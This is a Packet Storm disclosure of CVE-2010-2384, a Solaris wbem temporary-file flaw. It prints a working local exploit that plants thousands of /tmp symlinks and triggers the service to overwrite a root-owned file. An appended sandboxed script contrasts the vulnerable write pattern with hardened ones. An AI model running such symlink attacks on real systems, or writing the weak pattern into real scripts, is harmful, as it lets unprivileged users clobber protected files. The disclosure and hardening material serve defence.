Source: packetstorm | Author: Frank Stuart | ID: PACKETSTORM:92000
Published: Jul 21, 2010 - 12:00 a.m.

Solaris wbem Unsafe Use Of Temporary Files

packetstormsecurity.com

EPSS: 0.0004 (Low), percentile 0.4%

`
Below is the full disclosure information for CVE-2010-2384. It was  
reported to [email protected] on 3 January, 2010 and assigned Sun  
bug 6913886.  
  
This vulnerability was addressed by Sun/Oracle in the July 2010 Critical  
Patch Update  
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).  
  
------  
  
When the wbem service is enabled but hasn't been used before, it will run  
/usr/sadm/lib/smc/prereg/SUNWrmui/SUNWrmui_reg.sh, which can be exploited  
by an unprivileged local user like this:  
  
$ id  
uid=101(fstuart) gid=14(sysadmin)  
$ cd /tmp  
$ x=0  
$ while [ "$x" -ne 30000 ] ;do  
> ln -s /etc/important /tmp/dummy.$x  
> x=$(expr "$x" + 1)  
> done  
$ ls -dl /etc/important  
-rw-r--r-- 1 root root 38 Jan 3 22:43 /etc/important  
$ cat /etc/important  
This is an important file!  
  
EOF  
$ telnet localhost 898  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
  
  
  
^]  
telnet> quit  
Connection to localhost closed.  
$ cat /etc/important  
/<\/Scope>/ {  
n  
i\  
<Folder TreeDisplay="false"> \  
<Name>SUNWrmui Bootstrap Folder</Name> \  
<Description>This a temporary folder to workaround a bug. It  
should be deleted during install. But if you do see it in the toolbox  
editor, do NOT delete it.</Description> \  
<Icon>status_16.gif</Icon> \  
<LargeIcon>status_32.gif</LargeIcon> \  
</Folder>  
}  
  
SUNWrmui_reg.sh also uses /tmp/this_computer.$$ which can also be  
exploited.  
  
------  
  
`
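
The advisory does not show the source of SUNWrmui_reg.sh. Assuming it writes to the predictable /tmp/dummy.$$ name with a plain redirect, the following added example (not code from the advisory or from Sun/Oracle) contrasts that pattern with two safer ones inside a throwaway sandbox. The function names, the `rmui.XXXXXX` template and the sandbox files are hypothetical.

```sh
#!/bin/sh
# Added example. All paths live in a throwaway sandbox; names are hypothetical.

# Assumed weak pattern: predictable name in a shared directory. A plain ">"
# follows a symlink planted under that name and truncates its target.
write_predictable() {   # $1 = shared dir, $2 = data
    printf '%s\n' "$2" > "$1/dummy.$$"
}

# Hardened: mktemp -d atomically creates a mode-0700 directory with a random
# suffix, so no other user can pre-create entries inside it.
# Prints the path written; the caller removes the directory when done.
write_private() {       # $1 = data
    ( umask 077
      d=$(mktemp -d "${TMPDIR:-/tmp}/rmui.XXXXXX") || exit 1
      printf '%s\n' "$1" > "$d/dummy" || exit 1
      printf '%s\n' "$d/dummy" )
}

# If the name must stay fixed: noclobber (set -C) makes ">" fail when the
# path already names a regular file, directly or through a symlink.
write_noclobber() {     # $1 = path, $2 = data
    ( set -C; printf '%s\n' "$2" > "$1" ) 2>/dev/null
}

# Constructed scenario: "important" stands in for a root-owned file and a
# symlink already sits at the predictable name. Echoes one result line.
demo() {
    sb=$(mktemp -d) || return 1
    printf 'This is an important file!\n' > "$sb/important"
    ln -s "$sb/important" "$sb/dummy.$$"
    if write_noclobber "$sb/dummy.$$" "new data"; then nc=wrote; else nc=refused; fi
    after_nc=$(cat "$sb/important")
    write_predictable "$sb" "new data"
    after_weak=$(cat "$sb/important")
    rm -rf "$sb"
    printf 'noclobber=%s kept=[%s] weak=[%s]\n' "$nc" "$after_nc" "$after_weak"
}

demo
```

Of the two safer forms, the private directory is the one to prefer in a script that runs as root, because it removes the shared, attacker-writable location from the picture entirely.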
